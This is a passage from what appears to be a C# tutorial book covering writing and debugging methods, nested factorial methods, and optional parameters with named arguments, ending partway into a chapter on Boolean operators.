This program is simply a test harness for you to try out your code. When
the application starts running, it calls the run method. You add to the run
method the code that you want to try. (The way in which the method is
called requires an understanding of classes, which you look at in
Chapter 7.)
3. Add the following statements shown in bold to the body of the run
method, between the opening and closing braces:
void run()
{
double dailyRate = readDouble("Enter your daily rate: ");
int noOfDays = readInt("Enter the number of days: ");
writeFee(calculateFee(dailyRate, noOfDays));
}
The block of code you have just added to the run method calls the
readDouble method (which you will write shortly) to ask the user for the
daily rate for the consultant. The next statement calls the readInt method
(which you will also write) to obtain the number of days. Finally, the
writeFee method (to be written) is called to display the results on the
screen. Notice that the value passed to writeFee is the value returned by
the calculateFee method (the last one you will need to write), which
takes the daily rate and the number of days and calculates the total fee
payable.
Note You have not yet written the readDouble, readInt, writeFee, and
calculateFee methods, so IntelliSense does not display these methods
when you type this code. Do not try to build the application yet, because
it will fail.
Write the methods by using the Generate Method Stub Wizard
1. In the Code and Text Editor window, in the run method, right-click the
readDouble method call.
A shortcut menu appears that contains useful commands for generating
and editing code.
2. On the shortcut menu, click Quick Actions and Refactorings.
Visual Studio verifies that the readDouble method does not exist and
displays a wizard that enables you to generate a stub for this method.
Visual Studio examines the call to the readDouble method, ascertains
the type of its parameters and return value, and suggests a default
implementation.
3. Click Generate Method ‘Program.readDouble’. Visual Studio adds the
following method to your code:
private double readDouble(string v)
{
throw new NotImplementedException();
}
The new method is created with the private qualifier, which is described
in Chapter 7. The body of the method currently just throws a
NotImplementedException exception. (Exceptions are described in
Chapter 6.) You replace the body with your own code in the next step.
4. Delete the throw new NotImplementedException(); statement from the
readDouble method and replace it with the following lines of code
shown in bold:
private double readDouble(string v)
{
Console.Write(v);
string line = Console.ReadLine();
return double.Parse(line);
}
This block of code displays the string in variable v to the screen. This
variable is the string parameter passed in when the method is called; it
contains the message prompting the user to type in the daily rate.
Note The Console.Write method is similar to the
Console.WriteLine statement that you have used in earlier
exercises, except that it does not output a newline character after
the message.
The user types a value, which is read into a string using the ReadLine
method and converted to a double using the double.Parse method. The
result is passed back as the return value of the method call.
Note The ReadLine method is the companion method to
WriteLine; it reads user input from the keyboard, finishing when
the user presses the Enter key. The text typed by the user is passed
back as the return value. The text is returned as a string value.
5. In the run method, right-click the call to the readInt method, click Quick
Actions and Refactorings, and then click Generate Method
‘Program.readInt.’
The readInt method is generated like this:
private int readInt(string v)
{
throw new NotImplementedException();
}
6. Replace the throw new NotImplementedException(); statement in the
body of the readInt method with the following code shown in bold:
private int readInt(string v)
{
Console.Write(v);
string line = Console.ReadLine();
return int.Parse(line);
}
This block of code is similar to the code for the readDouble method.
The only difference is that the method returns an int value, so the string
typed by the user is converted to a number using the int.Parse method.
7. Right-click the call to the calculateFee method in the run method, click
Quick Actions and Refactorings, and then click Generate Method
‘Program.calculateFee.’
The calculateFee method is generated like this:
private object calculateFee(double dailyRate, int noOfDays)
{
throw new NotImplementedException();
}
Notice in this case that Visual Studio uses the names of the arguments
passed in to generate names for the parameters. (You can, of course,
change the parameter names if they are not suitable.) What is more
intriguing is the type returned by the method, which is object. Visual
Studio is unable to determine exactly which type of value should be
returned by the method from the context in which it is called. The object
type just means a “thing,” and you should change it to the type you
require when you add the code to the method. Chapter 7 covers the
object type in greater detail.
8. Change the definition of the calculateFee method so that it returns a
double, as shown in bold type here:
private double calculateFee(double dailyRate, int noOfDays)
{
throw new NotImplementedException();
}
9. Replace the body of the calculateFee method and change it to an
expression-bodied method with the following expression shown in bold;
remove the curly braces and use => to indicate the expression that
defines the body of the method. This statement calculates the fee
payable by multiplying the two parameters together:
private double calculateFee(double dailyRate, int noOfDays) =>
dailyRate * noOfDays;
10. Right-click the call to the writeFee method in the run method, click
Quick Actions and Refactorings, and then click Generate Method
‘Program.writeFee.’
Notice that Visual Studio uses the value passed in the call (the double
returned by calculateFee) to work out that the writeFee parameter
should be a double. Also, the method call
does not use a return value, so the type of the method is void:
private void writeFee(double v)
{
...
}
Tip If you feel sufficiently comfortable with the syntax, you can
also write methods by typing them directly into the Code and Text
Editor window. You do not always have to use the Generate menu
option.
11. Replace the code in the body of the writeFee method with the following
statement, which calculates the fee and adds a 10 percent commission
before displaying the result. Again, notice that this is now an expression-
bodied method:
private void writeFee(double v) => Console.WriteLine($"The consultant's fee is: {v * 1.1}");
12. On the Build menu, click Build Solution.
Refactoring code
A very useful feature of Visual Studio 2017 is the ability to refactor code.
Occasionally, you will find yourself writing the same (or similar) code in
more than one place in an application. When this occurs, highlight and right-
click the block of code you have just typed, click Quick Actions and
Refactorings, and then click Extract Method. The selected code is moved to a
new method named NewMethod. The Extract Method Wizard is also able to
determine whether the method should take any parameters and return a value.
After the method has been generated, you should change its name (by
overtyping) to something meaningful and also change the statement that has
been generated to call this method with the new name.
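For example, here is a sketch of the kind of transformation Extract Method performs; the promptForInput name shown after renaming is hypothetical:

// Before: the same prompt-and-read pattern typed in two places.
Console.Write("Enter your daily rate: ");
string rateText = Console.ReadLine();
// ...
Console.Write("Enter the number of days: ");
string daysText = Console.ReadLine();

// After extracting the pattern and renaming NewMethod to promptForInput:
private string promptForInput(string prompt)
{
    Console.Write(prompt);
    return Console.ReadLine();
}

// The duplicated statements become calls to the new method:
string rateText = promptForInput("Enter your daily rate: ");
string daysText = promptForInput("Enter the number of days: ");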
Test the program
1. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds the program and then runs it. A console
window appears.
2. At the Enter Your Daily Rate prompt, type 525 and then press Enter.
3. At the Enter The Number of Days prompt, type 17 and then press Enter.
The program writes the following message to the console window:
The consultant's fee is: 9817.5
4. Press the Enter key to close the application and return to Visual Studio
2017.
In the next exercise, you’ll use the Visual Studio 2017 debugger to run
your program in slow motion. You’ll see when each method is called (which
is referred to as stepping into the method) and then see how each return
statement transfers control back to the caller (also known as stepping out of
the method). While you are stepping into and out of methods, you can use the
tools on the Debug toolbar. However, the same commands are also available
on the Debug menu when an application is running in debug mode.
Step through the methods by using the Visual Studio 2017 debugger
1. In the Code and Text Editor window, find the run method.
2. Move the cursor to the first statement in the run method:
double dailyRate = readDouble("Enter your daily rate: ");
3. Right-click anywhere on this line, and then click Run To Cursor.
The program starts, runs until it reaches the first statement in the run
method, and then pauses. A yellow arrow in the left margin of the Code
and Text Editor window indicates the current statement, and the
statement itself is highlighted with a yellow background.
4. On the View menu, point to Toolbars, and then ensure that the Debug
toolbar is selected.
If it was not already visible, the Debug toolbar opens. It might appear
docked with the other toolbars. If you cannot see the toolbar, try using
the Toolbars command on the View menu to hide it and look to see
which buttons disappear. Then, display the toolbar again.
5. On the Debug toolbar, click the Step Into button. (This is the sixth
button from the left on the Debug toolbar.)
This action causes the debugger to step into the method being called.
The yellow cursor jumps to the opening brace at the start of the
readDouble method.
6. Click Step Into again to advance the cursor to the first statement:
Console.Write(v);
Tip You can also press F11 instead of repeatedly clicking Step
Into on the Debug toolbar.
7. On the Debug toolbar, click Step Over. (This is the seventh button from
the left.)
This action causes the method to execute the next statement without
debugging it (stepping into it). This action is useful primarily if the
statement calls a method, but you don’t want to step through every
statement in that method. The yellow cursor moves to the second
statement of the method, and the program displays the Enter Your Daily
Rate prompt in a console window before returning to Visual Studio
2017. (The console window might be hidden behind Visual Studio.)
Tip You can also press F10 instead of Step Over on the Debug
toolbar.
8. On the Debug toolbar, click Step Over again.
This time, the yellow cursor disappears, and the console window gets
the focus because the program is executing the Console.ReadLine
method and is waiting for you to type something.
9. Type 525 in the console window, and then press Enter.
Control returns to Visual Studio 2017. The yellow cursor appears on the
third line of the method.
10. Hover the mouse over the reference to the line variable on either the
second or third line of the method. (It doesn’t matter which.)
A ScreenTip appears, displaying the current value of the line variable
(“525”). You can use this feature to ensure that a variable has been set to
an expected value while you step through methods.
11. On the Debug toolbar, click Step Out. (This is the eighth button from the
left.)
This action causes the current method to continue to run uninterrupted to
its end. The readDouble method finishes and the yellow cursor is placed
back at the first statement of the run method. This statement has now
finished running.
Tip You can also press Shift+F11 instead of clicking Step Out on
the Debug toolbar.
12. On the Debug toolbar, click Step Into.
The yellow cursor moves to the second statement in the run method:
int noOfDays = readInt("Enter the number of days: ");
13. On the Debug toolbar, click Step Over.
This time, you have chosen to run the method without stepping through
it. The console window appears again, prompting you for the number of
days.
14. In the console window, type 17 and then press Enter.
Control returns to Visual Studio 2017 (you might need to bring Visual
Studio to the foreground). The yellow cursor moves to the third
statement of the run method:
writeFee(calculateFee(dailyRate, noOfDays));
15. On the Debug toolbar, click Step Into.
The yellow cursor jumps to the expression that defines the body of the
calculateFee method. This method is called first, before writeFee,
because the value returned by this method is used as the parameter to
writeFee.
16. On the Debug toolbar, click Step Out.
The calculateFee method call completes, and the yellow cursor jumps
back to the third statement of the run method.
17. On the Debug toolbar, click Step Into again.
This time, the yellow cursor jumps to the statement that defines the body
of the writeFee method.
18. Place the mouse over the v parameter in the method definition.
The value of v, 8925, is displayed in a ScreenTip.
19. On the Debug toolbar, click Step Out.
The message “The consultant’s fee is: 9817.5” is displayed in the
console window. (You might need to bring the console window to the
foreground to display it if it is hidden behind Visual Studio 2017.) The
yellow cursor returns to the third statement in the run method.
20. On the toolbar, click Continue to cause the program to continue running
without stopping at each subsequent statement.
Tip If the Continue button is not visible, click the Add Or Remove
Buttons drop-down menu that appears at the end of the Debug
toolbar, and then select Continue. The Continue button should now
appear. Alternatively, you can press F5 to continue running the
application without debugging.
The application completes and finishes running. Notice that the Debug
toolbar disappears when the application finishes; by default, the Debug
toolbar is displayed only when you are running an application in debug
mode.
Nesting methods
Sometimes you want to break a large method down into smaller pieces. You
can implement each piece as a helper method in its own right; this helps you
to test methods that perform complex processes and to verify that each part of
the large method functions as expected before bringing them together. It can
also aid readability and make a large method easier to maintain.
Note The terms large method and helper method are not official
vocabulary in C#. I have used them in this discussion to distinguish
between a method that is broken down into smaller pieces (the large
method) and the methods that implement these smaller pieces (the
helper methods).
By default, methods (large and helper) are accessible across the class in
which they are defined, and can be invoked from any other methods in that
class. In the case of helper methods that are only utilized by one large
method, it can make sense to keep these methods local to the large method
that runs them. This approach can ensure that a helper method designed to
operate in a given context is not used accidentally by another method for
which it was not designed. This is also good practice for implementing
encapsulation; the inner workings of a large method, including the helper
methods that it invokes, can be kept separate from other methods. This
practice reduces any dependencies between large methods; you can safely
change the implementation of a large method and the helper methods that it
invokes without accidentally impacting other elements of your application.
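As a minimal sketch of the idea (the method names here are hypothetical), a helper method nested inside a large method is visible only to that method:

void processOrder(string quantityText)
{
    // Nested helper method: visible only inside processOrder, so no
    // other method can call it by accident.
    int parseQuantity(string text)
    {
        return int.Parse(text);
    }

    int quantity = parseQuantity(quantityText);
    // ... process the order using quantity ...
}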
You can create helper methods by nesting them inside the large method
that uses them, as shown in the next exercise. This exercise calculates
factorials. You can use factorials to work out how many ways you can
arrange a given number of items. The factorial of a positive integer, n, is
defined in a recursive manner as n * factorial(n - 1), where the factorial of 1
is 1. For example, the factorial of 3 is 3 * factorial(2); factorial(2) is in turn
2 * factorial(1), and factorial(1) is 1. The whole calculation therefore
evaluates as 3 * 2 * 1, or 6. If you
have 3 items in a set, you can arrange them in 6 different ways. Similarly, if
you have 4 items you can arrange them in 24 different ways (4 * factorial(3)),
and you can arrange 5 items in 120 different ways (5 * factorial(4)).
Calculate factorials
1. Start Visual Studio 2017 if it is not already running.
2. Open the Factorial solution, which is in the \Microsoft
Press\VCSBS\Chapter 3\Factorial folder in your Documents folder.
3. In Solution Explorer, in the Factorials project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
4. Add the following statements shown in bold to the body of the run
method, between the opening and closing braces:
void run()
{
Console.Write("Please enter a positive integer: ");
string inputValue = Console.ReadLine();
long factorialValue = CalculateFactorial(inputValue);
Console.WriteLine($"Factorial() is ");
}
This code prompts the user to enter a numeric value, and then calls the
CalculateFactorial function (which you will write next) with this value,
before displaying the result.
5. Add a new method named CalculateFactorial below the run method.
This method should take a string parameter named input, and return a
long integer value, as follows:
long CalculateFactorial(string input)
{
}
6. In the CalculateFactorial method, after the initial opening brace, add the
statement shown below in bold:
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
}
This statement converts the string value passed in as the parameter to an
integer (the code does not currently check to make sure that the user has
entered a valid integer; you will see how to do this in Chapter 6,
“Managing errors and exceptions”).
7. Add a nested method named factorial to the CalculateFactorial
function. The factorial method should take an int value and return a
long. You will use this method to actually calculate the factorial of the
input parameter:
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
{
}
}
8. In the body of the factorial method, add the statements shown below in
bold. This code calculates the factorial of the input parameter using the
recursive algorithm described earlier:
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
{
if (dataValue == 1)
{
return 1;
}
else
{
return dataValue * factorial(dataValue - 1);
}
}
}
9. In the CalculateFactorial method, call the factorial method using the
integer value provided as input and return the result:
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
{
if (dataValue == 1)
{
return 1;
}
else
{
return dataValue * factorial(dataValue - 1);
}
}
long factorialValue = factorial(inputValue);
return factorialValue;
}
10. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds the program and then runs it. A console
window appears.
11. At the Please Enter a Positive Integer prompt, type 4, and then press
Enter.
The program writes the following message to the console window:
Factorial(4) is 24
12. Press the Enter key to close the application and return to Visual Studio
2017.
13. Run the application and provide the value 5 when prompted. This time,
the application should display the following message:
Factorial(5) is 120
14. Feel free to experiment with other values. Note that if you enter an input
value that is too large (try 60, for example), the result will exceed the
range that can be stored in a long integer, and you will get an incorrect
result; most likely a negative number generated as a result of numeric
overflow. You will learn more about how to handle this eventuality by
using checked exceptions in Chapter 6.
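As a brief preview (a sketch only; Chapter 6 covers this properly), performing the multiplication in a checked context causes the runtime to throw an OverflowException instead of silently producing a wrong answer:

long value = long.MaxValue;
long result = checked(value * 2);   // throws System.OverflowException at run time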
Using optional parameters and named arguments
You have seen that by defining overloaded methods, you can implement
different versions of a method that take different parameters. When you build
an application that uses overloaded methods, the compiler determines which
specific instances of each method it should use to satisfy each method call.
This is a common feature of many object-oriented languages, not just C#.
However, developers can use other languages and technologies for
building Windows applications and components that do not follow these
rules. A key feature of C# and other languages designed for the .NET
Framework is the ability to interoperate with applications and components
written with other technologies. One of the principal technologies that
underpins many Windows applications and services running outside the .NET
Framework is the Component Object Model (COM). In fact, the common
language runtime (CLR) used by the .NET Framework is also heavily
dependent on COM, as is the Windows Runtime of Windows 10. COM does
not support overloaded methods; instead, it uses methods that can take
optional parameters. To make it easier to incorporate COM libraries and
components into a C# solution, C# also supports optional parameters.
Optional parameters are also useful in other situations. They provide a
compact and simple solution when it is not possible to use overloading
because the types of the parameters do not vary sufficiently to enable the
compiler to distinguish between implementations. For example, consider the
following method:
public void DoWorkWithData(int intData, float floatData, int moreIntData)
{
...
}
The DoWorkWithData method takes three parameters: two ints and a
float. Now suppose that you want to provide an implementation of
DoWorkWithData that takes only two parameters: intData and floatData.
You can overload the method like this:
public void DoWorkWithData(int intData, float floatData)
{
...
}
If you write a statement that calls the DoWorkWithData method, you can
provide either two or three parameters of the appropriate types, and the
compiler uses the type information to determine which overload to call:
int arg1 = 99;
float arg2 = 100.0F;
int arg3 = 101;
DoWorkWithData(arg1, arg2, arg3); // Call overload with three parameters
DoWorkWithData(arg1, arg2);       // Call overload with two parameters
However, suppose that you want to implement two additional versions of
DoWorkWithData that take only the first parameter and the third parameter.
You might be tempted to try this:
public void DoWorkWithData(int intData)
{
...
}
public void DoWorkWithData(int moreIntData)
{
...
}
The issue here is that these two overloads appear identical to the compiler.
Your code will fail to compile and will instead generate the error “Type
‘typename’ already defines a member called ‘DoWorkWithData’ with the
same parameter types.” To understand why this is so, think what would
happen if this code were legal. Consider the following statements:
int arg1 = 99;
int arg3 = 101;
DoWorkWithData(arg1);
DoWorkWithData(arg3);
Which overload or overloads would the calls to DoWorkWithData invoke?
Using optional parameters and named arguments can help to solve this
problem.
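As a preview of the sections that follow (a sketch, not the only possible design), you could replace the ambiguous overloads with a single method whose parameters have default values, and let callers name the argument they want to supply:

public void DoWorkWithData(int intData = 0, float floatData = 0.0F, int moreIntData = 0)
{
    // ...
}

DoWorkWithData(arg1);                 // supplies intData; the others use their defaults
DoWorkWithData(moreIntData : arg3);   // supplies moreIntData by name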
Defining optional parameters
You specify that a parameter is optional when you define a method by
providing a default value for the parameter. You indicate a default value by
using the assignment operator. In the optMethod method shown next, the first
parameter is mandatory because it does not specify a default value, but the
second and third parameters are optional:
void optMethod(int first, double second = 0.0, string third = "Hello") {
...
}
You must specify all mandatory parameters before any optional
parameters.
You can call a method that takes optional parameters in the same way that
you call any other method: you specify the method name and provide any
necessary arguments. The difference with methods that take optional
parameters is that you can omit the corresponding arguments and the method
will use the default value when it runs. In the example that follows, the first
call to the optMethod method provides values for all three parameters. The
second call specifies only two arguments, and these values are applied to the
first and second parameters. The third parameter receives the default value of
“Hello” when the method runs.
optMethod(99, 123.45, "World"); // Arguments provided for all three parameters
optMethod(100, 54.321);         // Arguments provided for first two parameters only
Passing named arguments
By default, C# uses the position of each argument in a method call to
determine to which parameter the argument applies. Hence, the second
example of the optMethod method shown in the previous section passes the
two arguments to the first and second parameters in the method because this
is the order in which they occur in the method declaration. With C#, you can
also specify parameters by name. This feature lets you pass the arguments in
a different sequence. To pass an argument as a named parameter, you specify
the name of the parameter, followed by a colon and the value to use. The
following examples perform the same function as those shown in the
previous section, except that the parameters are specified by name:
optMethod(first : 99, second : 123.45, third : "World");
optMethod(first : 100, second : 54.321);
Named arguments give you the ability to pass arguments in any order.
You can rewrite the code that calls the optMethod method such as shown
here:
optMethod(third : "World", second : 123.45, first : 99);
optMethod(second : 54.321, first : 100);
This feature also makes it possible for you to omit arguments. For
example, you can call the optMethod method and specify values for the first
and third parameters only and use the default value for the second parameter,
like this:
optMethod(first : 99, third : "World");
Additionally, you can mix positional and named arguments. However, if
you use this technique, you must specify all the positional arguments before
the first named argument.
optMethod(99, third : "World"); // First argument is positional
Resolving ambiguities with optional parameters and
named arguments
Using optional parameters and named arguments can result in some possible
ambiguities in your code. You need to understand how the compiler resolves
these ambiguities; otherwise, you might find your applications behaving in
unexpected ways. Suppose that you define the optMethod method as an
overloaded method, as shown in the following example:
void optMethod(int first, double second = 0.0, string third = "Hello")
{
    ...
}

void optMethod(int first, double second = 1.0, string third = "Goodbye", int fourth = 100)
{
    ...
}
This is perfectly legal C# code that follows the rules for overloaded
methods. The compiler can distinguish between the methods because they
have different parameter lists. However, as demonstrated in the following
example, a problem can arise if you attempt to call the optMethod method
and omit some of the arguments corresponding to one or more of the optional
parameters:
optMethod(1, 2.5, "World");
Again, this is perfectly legal code, but which version of the optMethod
method does it run? The answer is the version that most closely matches the
method call, so the code invokes the method that takes three parameters and
not the version that takes four. That makes good sense, so consider this one:
optMethod(1, fourth : 101);
In this code, the call to optMethod omits arguments for the second and
third parameters, but it specifies the fourth parameter by name. Only one
version of optMethod matches this call, so this is not a problem. This next
example will get you thinking, though:
optMethod(1, 2.5);
This time, neither version of the optMethod method exactly matches the
list of arguments provided. Both versions of the optMethod method have
optional parameters for the second, third, and fourth arguments. So, does this
statement call the version of optMethod that takes three parameters and use
the default value for the third parameter, or does it call the version of
optMethod that takes four parameters and use the default value for the third
and fourth parameters? The answer is that it does neither. This is an
unresolvable ambiguity, and the compiler does not let you compile the
application. The same situation arises with the same result if you try to call
the optMethod method, as shown in any of the following statements:
optMethod(1, third : "World");
optMethod(1);
optMethod(second : 2.5, first : 1);
In the final exercise in this chapter, you will revisit the DailyRate project
and practice implementing methods that take optional parameters and calling
them by using named arguments. You will also test common examples of
how the C# compiler resolves method calls that involve optional parameters
and named arguments.
Define and call a method that takes optional parameters
1. Using Visual Studio 2017, open the DailyRate solution, which is in the
\Microsoft Press\VCSBS\Chapter 3\DailyRate Using Optional
Parameters folder in your Documents folder.
2. In Solution Explorer, in the DailyRate project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
This version of the application is empty apart from the Main method and
the skeleton version of the run method.
3. In the Program class, add the following calculateFee method after the
run method. This is the same version of the method that you
implemented in the previous set of exercises, except that it takes two
optional parameters with default values. The method also prints a
message indicating the version of the calculateFee method that was
called. (You will add overloaded implementations of this method in the
following steps.)
private double calculateFee(double dailyRate = 500.0, int noOfDays = 1)
{
    Console.WriteLine("calculateFee using two optional parameters");
    return dailyRate * noOfDays;
}
4. Add another implementation of the calculateFee method to the Program
class, as shown in the code below. This version takes one optional
parameter, called dailyRate, of type double. The body of the method
calculates and returns the fee for a single day only.
private double calculateFee(double dailyRate = 500.0)
{
    Console.WriteLine("calculateFee using one optional parameter");
    int defaultNoOfDays = 1;
    return dailyRate * defaultNoOfDays;
}
5. Add a third implementation of the calculateFee method to the Program
class. This version takes no parameters and uses hardcoded values for
the daily rate and number of days.
private double calculateFee()
{
Console.WriteLine("calculateFee using hardcoded values");
double defaultDailyRate = 400.0;
int defaultNoOfDays = 1;
return defaultDailyRate * defaultNoOfDays;
}
6. At the beginning of the run method, add the following statements in
bold that call calculateFee and display the results:
public void run()
{
    double fee = calculateFee();
    Console.WriteLine($"Fee is {fee}");
}
Tip You can quickly view the definition of a method from the
statement that invokes it. To do so, right-click the method call and
then click Peek Definition. A Peek Definition window opens, showing
the definition of the calculateFee method inline.
This feature is extremely useful if your code is split across
multiple files, or even if it is in the same file, but the file is very
long.
7. On the Debug menu, click Start Without Debugging to build and run the
program.
The program runs in a console window and displays the following
messages:
calculateFee using hardcoded values
Fee is 400
The run method called the version of calculateFee that takes no
parameters rather than either of the implementations that take optional
parameters because that version most closely matches the method call.
Press any key to close the console window and return to Visual Studio.
8. In the run method, modify the statement that calls calculateFee to match
the code shown in bold here:
public void run()
{
    double fee = calculateFee(650.0);
    Console.WriteLine($"Fee is {fee}");
}
9. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
calculateFee using one optional parameter
Fee is 650
This time, the run method called the version of calculateFee that takes
one optional parameter. As before, this is the version that most closely
matches the method call.
Press any key to close the console window and return to Visual Studio.
10. In the run method, modify the statement that calls calculateFee again:
public void run()
{
    double fee = calculateFee(500.0, 3);
    Console.WriteLine($"Fee is {fee}");
}
11. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
calculateFee using two optional parameters
Fee is 1500
As you might expect from the previous two cases, the run method called
the version of calculateFee that takes two optional parameters.
Press any key to close the console window and return to Visual Studio.
12. In the run method, modify the statement that calls calculateFee and
specify the dailyRate parameter by name:
public void run()
{
    double fee = calculateFee(dailyRate : 375.0);
    Console.WriteLine($"Fee is {fee}");
}
13. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
calculateFee using one optional parameter
Fee is 375
As earlier, the run method calls the version of calculateFee that takes
one optional parameter. Changing the code to use a named argument
does not change the way in which the compiler resolves the method call
in this example.
Press any key to close the console window and return to Visual Studio.
14. In the run method, modify the statement that calls calculateFee and
specify the noOfDays parameter by name.
public void run()
{
    double fee = calculateFee(noOfDays : 4);
    Console.WriteLine($"Fee is {fee}");
}
15. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
calculateFee using two optional parameters
Fee is 2000
This time, the run method called the version of calculateFee that takes
two optional parameters. The method call has omitted the first parameter
(dailyRate) and specified the second parameter by name. The version of
the calculateFee method that takes two optional parameters is the only
one that matches the call.
Press any key to close the console window and return to Visual Studio.
16. Modify the implementation of the calculateFee method that takes two
optional parameters. Change the name of the first parameter to
theDailyRate and update the return statement to match that shown in
bold in the following code:
private double calculateFee(double theDailyRate = 500.0, int noOfDays = 1)
{
    Console.WriteLine("calculateFee using two optional parameters");
    return theDailyRate * noOfDays;
}
17. In the run method, modify the statement that calls calculateFee and
specify the theDailyRate parameter by name.
public void run()
{
    double fee = calculateFee(theDailyRate : 375.0);
    Console.WriteLine($"Fee is {fee}");
}
18. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
calculateFee using two optional parameters
Fee is 375
The previous time that you specified the daily rate but not the number of
days (step 12), the run method called the version of calculateFee that
takes one optional parameter. This time, the run method called the version of
calculateFee that takes two optional parameters. In this case, using a
named argument has changed the way in which the compiler resolves
the method call. If you specify a named argument, the compiler
compares the argument name to the names of the parameters specified in
the method declarations and selects the method that has a parameter with
a matching name. If you had specified the argument as aDailyRate:
375.0 in the call to the calculateFee method, the program would have
failed to compile because no version of the method has a parameter that
matches this name.
Press any key to close the console window and return to Visual Studio.
Summary
In this chapter, you learned how to define methods to implement a named
block of code. You saw how to pass parameters into methods and how to
return data from methods. You also saw how to call a method, pass
arguments, and obtain a return value. You learned how to define overloaded
methods with different parameter lists, and you saw how the scope of a
variable determines where it can be accessed. Then, you used the Visual
Studio 2017 debugger to step through code as it runs. Finally, you learned
how to write methods that take optional parameters and how to call methods
by using named parameters.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 4, “Using decision statements.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To declare a method: Write the method within a class. Specify the method
name, parameter list, and return type, followed by the body of the method
between braces. For example:

int addValues(int leftHandSide, int rightHandSide) { ... }

To return a value from within a method: Write a return statement within the
method. For example:

return leftHandSide + rightHandSide;

To return multiple values from within a method: Write a return statement
that returns a tuple. For example:

return (division, remainder);

To return from a method before the end of the method: Write a return
statement within the method. For example:

return;

To define an expression-bodied method: Use the => sequence followed by
the expression that defines the body of the method and a closing semicolon.
For example:

double calculateFee(double dailyRate, int noOfDays) => dailyRate * noOfDays;

To call a method: Write the name of the method followed by any arguments
between parentheses. For example:

addValues(39, 3);

To call a method that returns a tuple: Invoke the method as above, but assign
the result to a set of variables enclosed in parentheses. There should be one
variable for each value of the tuple being returned. For example:

int division, remainder;
(division, remainder) = divide(leftHandSide, rightHandSide);

To use the Generate Method Stub Wizard: Right-click a call to the method,
and then click Generate Method Stub.

To create a nested method: Define the method within the body of another
method. For example:

long CalculateFactorial(string input)
{
    ...
    long factorial(int dataValue)
    {
        if (dataValue == 1)
        {
            return 1;
        }
        else
        {
            return dataValue * factorial(dataValue - 1);
        }
    }
    ...
}

To display the Debug toolbar: On the View menu, point to Toolbars, and then
click Debug.

To step into a method: On the Debug toolbar or the Debug menu, click Step
Into.

To step out of a method: On the Debug toolbar or the Debug menu, click Step
Out.

To specify an optional parameter to a method: Provide a default value for the
parameter in the method declaration. For example:

void optMethod(int first, double second = 0.0, string third = "Hello") { ... }

To pass a method argument as a named parameter: Specify the name of the
parameter in the method call. For example:

optMethod(first : 100, third : "World");
CHAPTER 4
Using decision statements
After completing this chapter, you will be able to:
Declare Boolean variables.
Use Boolean operators to create expressions whose outcome is either
true or false.
Write if statements to make decisions based on the result of a Boolean
expression.
Write switch statements to make more complex decisions.
Chapter 3, “Writing methods and applying scope,” shows how to group
related statements into methods. It also demonstrates how to use parameters
to pass information to a method and how to use return statements to pass
information out of a method. Dividing a program into a set of discrete
methods, each designed to perform a specific task or calculation, is a
necessary design strategy. Many programs need to solve large and complex
problems. Breaking up a program into methods helps you to understand these
problems and focus on how to solve them, one piece at a time.
The methods in Chapter 3 are very straightforward, with each statement
executing sequentially after the previous statement completes. However, to
solve many real-world problems, you also need to be able to write code that
selectively performs different actions and that takes different paths through a
method depending on the circumstances. In this chapter, you’ll learn how to
accomplish this task.
Declaring Boolean variables
In the world of C# programming (unlike in the real world), everything is
black or white, right or wrong, true or false. For example, if you create an
integer variable called x, assign the value 99 to it, and then ask whether x
contains the value 99, the answer is definitely true. If you ask if x is less than
10, the answer is definitely false. These are examples of Boolean expressions.
A Boolean expression always evaluates to true or false.
Note The answers to these questions are not necessarily definitive for
all other programming languages. An unassigned variable has an
undefined value, and you cannot, for example, say that it is definitely
less than 10. Issues such as this one are a common source of errors in C
and C++ programs. The Microsoft Visual C# compiler solves this
problem by ensuring that you always assign a value to a variable before
examining it. If you try to examine the contents of an unassigned
variable, your program will not compile.
Visual C# provides a data type called bool. A bool variable can hold one
of two values: true or false. For example, the following three statements
declare a bool variable called areYouReady, assign true to that variable, and
then write its value to the console:
bool areYouReady;
areYouReady = true;
Console.WriteLine(areYouReady); // writes True to the console
Using Boolean operators
A Boolean operator is an operator that performs a calculation whose result is
either true or false. C# has several very useful Boolean operators, the
simplest of which is the NOT operator, represented by the exclamation point
(!). The ! operator negates a Boolean value, yielding the opposite of that
value. In the preceding example, if the value of the variable areYouReady is
true, the value of the expression !areYouReady is false.
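For example, the following fragment applies the ! operator to the areYouReady variable declared earlier and writes False to the console:
bool areYouReady = true;
Console.WriteLine(!areYouReady); // writes False to the console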
Understanding equality and relational operators
Two Boolean operators that you will frequently use are equality (==) and
inequality (!=). These are binary operators with which you can determine
whether one value is the same as another value of the same type, yielding a
Boolean result. The following table summarizes how these operators work,
using an int variable called age as an example.
Operator   Meaning        Example       Outcome if age is 42
==         Equal to       age == 100    False
!=         Not equal to   age != 0      True
Don’t confuse the equality operator == with the assignment operator =.
The expression x==y compares x with y and has the value true if the values
are the same. The expression x=y assigns the value of y to x and returns the
value of y as its result.
Closely related to == and != are the relational operators. You use these
operators to find out whether a value is less than or greater than another value
of the same type. The following table shows how to use these operators.
Operator   Meaning                     Example     Outcome if age is 42
<          Less than                   age < 21    False
<=         Less than or equal to       age <= 18   False
>          Greater than                age > 16    True
>=         Greater than or equal to    age >= 42   True
Understanding conditional logical operators
C# also provides two other binary Boolean operators: the logical AND
operator, which is represented by the && symbol, and the logical OR
operator, which is represented by the || symbol. Collectively, these are known
as the conditional logical operators. Their purpose is to combine two
Boolean expressions or values into a single Boolean result. These operators
are similar to the equality and relational operators in that the value of the
expressions in which they appear is either true or false, but they differ in that
the values on which they operate must also be either true or false.
The outcome of the && operator is true if and only if both of the Boolean
